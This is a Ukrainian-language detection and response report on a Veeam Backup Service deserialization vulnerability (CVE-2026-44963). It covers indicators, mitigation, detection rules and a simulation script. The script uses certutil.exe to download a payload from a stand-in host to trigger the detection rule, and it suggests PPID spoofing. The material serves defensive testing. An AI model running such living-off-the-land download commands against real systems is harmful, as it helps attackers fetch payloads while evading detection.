CVE-2026-44963: Індикатори експлуатації служби резервного копіювання Veeam
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Цей звіт описує індикатори компрометації, пов’язані з CVE-2026-44963, вразливістю у Veeam Backup Service, яка може дозволити виконання віддаленого коду через небезпечну десеріалізацію. Зловмисники можуть використовувати цю вразливість для запуску підозрілих дочірніх процесів з сервісу Veeam. Отримана активність може призвести до несанкціонованого доступу та створити можливості для латерального переміщення по мережі.
Розслідування
Розслідування зосереджується на виявленні підозрілих дочірніх процесів, запущених Veeam.Backup.Service.exe, включаючи інструменти такі як cmd.exe or powershell.exe, та ідентифікацію незвичайної активності в мережі на портах, пов’язаних з Veeam. Аналітики також повинні стежити за несанкціонованими подіями входу та несподіваними змінами файлів у каталогах Veeam.
Зменшення ризиків
Щоб зменшити ризик, адміністратори повинні оновити Veeam Backup & Replication до версії, що виправляє небезпечну десеріалізацію. Політики брандмауера повинні строго обмежити доступ до портів Veeam 9392-9419, та захисники повинні контролювати аутентифікацію до цих сервісів нерегламентними доменними користувачами. Облікові записи служб також повинні бути обмежені відповідно до принципів найменшої привілеї.
Відповідь
Якщо виявлено підозрілу активність, уражений сервер Veeam слід негайно ізолювати від мережі. Розслідувачі повинні перевірити журнали виконання процесів, включаючи Ідентифікатор події 4688 та телеметрію Sysmon, разом з журналами підключення до мережі, щоб визначити ступінь компрометації. Необхідно провести аудит останньої активності облікових записів і скинути облікові дані для всіх облікових записів, задіяних під час передбачуваного періоду вторгнення.
Потік атак
Виявлення
Запуск підозрілого процесу сервісом Veeam Backup (через cmdline)
Переглянути
Підозріла процесна та мережева активність з Veeam Backup Service [Windows Sysmon]
Переглянути
Підозрілі дочірні процеси, запущені Veeam Backup Service [Windows Process Creation]
Переглянути
Виконання симуляції
Передумова: Перевірка телеметрії та базового рівня повинна пройти.
Обґрунтування: Цей розділ детально описує точне виконання техніки супротивника (TTP), призначеної для запуску правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та мають на меті генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.
-
Наратив атаки та команди: Супротивник атакує вразливість у Veeam Backup Service (симульовано) для отримання привілеїв виконання. Щоб залишитися непомітним під час завантаження другого етапу навантаження, зловмисник використовує захоплений процес Veeam для запуску
certutil.exe, загального бінарного файлу Living-off-the-Land, для отримання віддаленого файлу. Ця дія призначена для активаціїпроцесної_створеннялогіки правила виявлення. -
Скрипт регресійного тесту:
# СТАРТ СИМУЛЯЦІЇ: Цей скрипт імітує запуск підозрілого процесу сервісом Veeam. # Примітка: Оскільки ми не можемо легко 'стати' сервісом Veeam без прав адміністратора/системи, # ми симулюємо телеметрію шляхом створення фіктивного процесу, який імітує шлях ParentImage. $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe" $TargetBinary = "certutil.exe" Write-Host "[+] Імітація підозрілого дочірнього процесу з $VeeamPath" -ForegroundColor Cyan # У реальному середовищі вразливість спричинить виклик сервісом цього. # Для валідації ми запускаємо процес. Щоб строго відповідати вимогам 'ParentImage' Sigma-правила в лабораторних умовах, тестувальник має вручну перейменувати процес # або використати інструмент для підміни ідентифікатора батьківського процесу (PPID), якщо тестується конкретний EDR. Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden Write-Host "[+] Команда симуляції виконана." -ForegroundColor Green -
Команди очищення:
# Видалити всі тимчасові файли, створені симуляцією Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue Stop-Process -Name "certutil" -ErrorAction SilentlyContinue